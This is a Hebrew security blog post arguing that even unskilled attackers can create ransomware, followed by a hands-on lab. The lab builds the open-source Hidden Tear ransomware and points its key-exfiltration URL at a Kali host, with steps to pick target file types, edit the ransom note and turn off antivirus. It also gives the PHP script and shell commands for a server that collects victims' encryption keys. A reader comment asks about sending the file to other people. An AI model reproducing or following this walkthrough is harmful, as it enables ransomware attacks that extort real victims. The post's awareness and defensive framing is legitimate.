Home אבטחת מידעPenetration Testing - Offense כיצד כל אחד יכול ליצור Ransomware מהם הסכנות ומדוע גם תוקף לא מיומן הוא סכנה!

כיצד כל אחד יכול ליצור Ransomware מהם הסכנות ומדוע גם תוקף לא מיומן הוא סכנה!

by Tal Ben Shushan 27/10/2020 1 comment
כיצד כל אחד יכול ליצור Ransomware מהם הסכנות ומדוע גם תוקף לא מיומן הוא סכנה!
נהנתם מהמאמר ? שתפו אותו!

לאחרונה התרבו המקרים בהם ארגונים נפגעים ממתקפות כופרה, מארגון קטן ועד לארגון גדול, ללא ספק שהארגונים הגדולים "נופלים" במתקפות מתוחכמות יותר ואילו הקטנים \ הבינוניים במתקפות פחות מתוחכמות.
גם ארגונים גדולים שחושבים שאין צורך במנהל אבטחת מידע או בצוות מיומן חוטפים מתקפות.
אני אסתייג ואוסיף שזה עלול לקרות גם לחברות גדולות מאוד וחזקות מבחינת אבטחת מידע בגלל טעות ולו הקטנה ביותר.
אחד הנושאים חוץ מגניבת מידע, DDOS, פריצה לארגון וכו' הוא "הכופרה", ובשיחות שיצא לי להיות בהם, מומחים ומבינים באבטחת מידע טוענים כי דרוש ידע רב על מנת ליצור נזק לארגון אפילו הקטן ביותר ברמת התקפות ואבטחת מידע.

בתקופה זו שבה קיימים כלים מסיביים לביצוע התקפות, רמת הלמידה עלתה עשרות מונים מפעם, אם פעם ספרים שלטו בשוק הלימדה והיה צריך להגיע פיזית לקנות את הספר (שלא תמיד מעודכן) היום לומדי אבטחת מידע יודעים כי נתין להירשם לקורסים מקצועיים במכללות, סרטונים, מאמרים רחבי היקף, טלפונים ולימוד מרוחק יצרו למעשה אנשים בעלי ידע מאיש סיסטם \ איש מחשוב לאיש אבטחת מידע ותוקף שיכול לגרום לנזק.

אין ספק שכל מה שרשמתי נתון לוויכוח, אך דוגמאות מרחבי המרשתת לא חסר:

כתבה מכלכליסט:

https://www.calcalist.co.il/internet/articles/0,7340,L-3848434,00.html

כתבה מ Ynet

https://www.ynet.co.il/digital/technews/article/Byd22xugD

 

לחלק מהחברות יש מנהל אבטחת מידע בלבד שסוקר את הארגון ומנחה אותו או אפילו צוות SOC ואנשי אבטחת מידע, לחלק הממשלתי יש את מערך הסייבר שנותן הנחיות ומכוון את הארגונים (אציין שלחברות הממשלתיות יש גם אנשי אבטחת מידע ולחלקם מרכזי SOC) ויש את אלו שאין להם לא את ולא זה.

Ransomware כופר יכול להגיע בכמה דרכים ולכן דרוש כמה מערכות הגנה וניטור שטוף של הארגון

  • אימיילים ובמיוחד Phishing פישינג
  • מדיה נתיקה
  • הורדה מהאינטרנט
  • חולשות במערכות ההפעלה
  • התקפות יזומות של תוקפים

לכל המקרים הללו יש הגנות מגוונות, ממערכות שעולות כסף ועד אלו שבחינם

  • סינון תוכן מובנה לאימיילים החל מ Office 365 או ג'מייל ועד למערכות הגנה למיילים מ Cybonet ל TrendMicro וחברות רבות ונוספות
  • חסימה של התקנים כמו DOK, כבלי טעינה ובכלל חסימה מלא לUSB ע"י מגוון כלים
  • שימוש במערכות Sandbox ו EDR\XDR ומערכות הלבנה השחרה, אי יכול להתקין קבצים שאינם חתומים וכו'
  • שימוש במערכות סריקה לגילוי חולשות וחסימתם, מרמת הקוד של מערכות .Net ועד למערכת ההפעלה ועדכונים שוטפים ואם כבר אני מציין את זה, אז מערכות לינוקס שרוב הארגונים שכחו לעדכן מהפחד שמשהו יקרוס שם.
  • התקפות יזומות על מערכות ה VPN שלאחרונה התרבו, ניסיון לחדור לארגון דרך Trojan Horse ושלל צורות

תקופה זו המאפיינת התחברות מרובה מהבית שבה ארגונים נותנים לעובד להתחבר בVPN "קלאסי" היא מסוכנת ביותר, שכן המחשב הפרטי של העובד והמחשב הארגוני "חולקים" כעת את אותה הרשת ובכך מסכנים את הארגון להתקפות כופר.
(ניתן לעבור "Reverse Proxy VPN" שלדעתי יש בו פחות סיכון מ VPN מסורתי)

כדי להוכיח יחסית את היכולת המהירה של תוקפים ליצור כלים במהירות מבלי להשקיע זמן, אציג במאמר זה בעזרת מעבדה פשוטה, הקמה מהירה של כופרה , אכן צורה זו יחסית ישנה, אבל כדי לחסוך בזמן אציג אותה, כמובן שניתן לבצע באופן דומה על תוכנות כופר דומות אחרות וחדשות מהשנה הזאת.

מעבדה – Hidden Tear Ransomware

**אינני אחראי לשום נזק או כל מעשה שעשיתם במישרין או בעקיפין והמעבדה היא אחריותכם בלבד, מעבדה זו היא למטרות למידה בלבד!!**

דרישות:

** על מנת לא ליצור נזק למחשב האישי שלכם יש להתקין הכל בסביבה וירטואלית

  • Kali 2020
  • Windows 10 – שמותקן בו Visual Studio Community Edition להורדה ניתן ללחוץ כאן (עדיף לא המחשב הפרטי שלכם אלא VM או מחשב אחר)
  • Windows 7/10 עם אנטי ווירוס מכובה (רוצים להשתמש באחד שלא כל כך מתגלה, חפשו מאמרים פה באתר בנושא זה)

נתחיל,

הפעילו את המתקין של Visual Studio וסמנו את הפיצ'ר הבא

כעת בסיום ההתקנה הפעילו את Visual Studio ובדקו שהוא עולה תקין

כעת נכנס לgithub ונוריד את כל ה Git למחשב

https://bit.ly/2J9OoLa

כעת נוריד למחשב

  • אם נחסמתם ע"י הדפדפן, השתמשו ב Firefox ולחצו על Download Anyway
  • אם נחסמתם ע"י האנטי ווירוס של ווינדוס בטלו אותו

חלצו את הקובץ והגיעו ולחצו על

Visual Studio יעלה, בצד שמאל נתבו ל Form1.cs

בתמונה זו גם תוכלו לקרוא מי הכותב של הכופרה וגם את הבקשה לא להשתמש בה כ Ransomware

נתחיל לשנות את התוכנה לפי הצרכים שלנו

כאן נערוך את שדה זה לכתובת ה IP של Kali שביקשתי בתחילת המעבדה

192.168.1.26 – הוא Kali 2020 המותקן אצלי כ VM

שנו את ה https ל http ואת הכתובת של האתר

לכתובת כמו בתמונה

שדה זה למעשה יגדיר לאיפה יגיע המפתח הפרטי, שאיתו תוכלו לפתוח את הקבצים המוצפנים, במציאות אם תרצו להשתמש בטכניקה הזו, חשוב לקחת Ransomware המשתמש ברשת TOR כדוגמת Wannacry

נגלול למטה יותר ונגיע לשדות הבאים

\\Desktop\\test

אומר שרק הקבצים בתוך תיקיית test יוצפנו

** היזהרו!!!! אל תגדירו בשלב זה נתיב אחר כמו רק \\desktop והסיבה היא שאם בטעות ב Visual Studio תלחצו על Compile הקוד ירוץ במחשב שלכם ויצפין את שולחן העבודה**

השאירו את זה כמו שזה כעת ונמשיך

\\Desktop\\test\\READ_IT.txt

הוא שם הקובץ הטקסט שהמשתמש שהפעיל את הכופר יקרא, הטקסט שיהיה בפנים זה מה שמצויין למטה, לרוב התוקף יציין דרך ליצור איתי קשר, לרוב ברשת האפלה TOR ויציין את הסכום שהוא דורש בביטקוין (כל זה כמובן מטעמים שלא יגלו מי זה)

נעלה קצת למעלה ונגלה רשימת סיומות של קבצים, כאן תוכלו להחליט איזה סוגי קבצים אתם מצפינים

קצת למטה יותר, תוכלו לשנות את הסיומת של הקבצים הננעלים, כמובן שאם תשנו פה את הסיומת , תאלצו אחרי זה ב Decrypt Software להגדיר את הסיומת. (כרגע אל תגעו)

כעת לחצו על Build Solution

בסיום, הקובץ יווצר בנתיב הבא

העתיקו אותו לווינדוס 7/10 שבה נפעיל אותו (עדיפות כמובן ל VM)

כעת עברו לנתיב הבא והעתיקו את הכלי שאיתו נבצע את ה Decrypt לקבצים

בווינדוס 7/10

כעת נגדיר את Kali שאליו כשרת Web יעבור המפתח הפרטי

נפתח את הטרמינל ונעבור לתיקיית ה Web

cd /var/www/html/

כעת ניצור ונערוך את הקובץ PHP שייכתב אליו המפתח

sudo nano write.php

נרשום בתוכו את הטקסט הבא

GNU nano 4.9.2 write.php 
<?php
$info = $_GET['info'];
$file = fopen("key.txt", "a");
fwrite($file, $info."". PHP_EOL);
fclose($file);
?>

נסגור את הקובץ ונשמור אותו

ניצור קובץ ריק בשם

sudo touch key.txt

נגדיר שהקבוצה של הקובץ טקסט היא

sudo chgrp www-data key.txt

ונשנה את ההרשאות בכדי שהמפתח ירשם ע"י קובץ ה write.php

sudo chmod g+rw key.txt

נפעיל את שרת ה Web ב Kali

sudo systemctl start apache2

כעת נעבור ל Windows 7/10 ונפעיל את הכופר

כעת ניצור תיקייה בשולחן העבודה בשם test כמו בתמונה ונעביר אליה כמה מסמכים לא חשובים

כעת נפעיל את הכופר ונמתין לפחות 10 שניות, בסיום הקבצים יוצפנו ביחד עם ההודעה שיכלתם לערוך

כעת נעבור לקאלי על מנת להוציא את המפתח, נבצע

cat key.txt

ונקבל את המפתח, נעתיק אותו

נפעיל את ה Decrypt ונכניס את המפתח לשם

והקבצים כעת חזרו!

בהצלחה!

 

 

 

 

 

מאמרים קשורים

1 comment

גדול 03/11/2020 - 08:45

ואני יכול לשלוח את הקובץ לאנשים אחרים ואז הקבצים שלהם יוצפנו?

Reply

Leave a Comment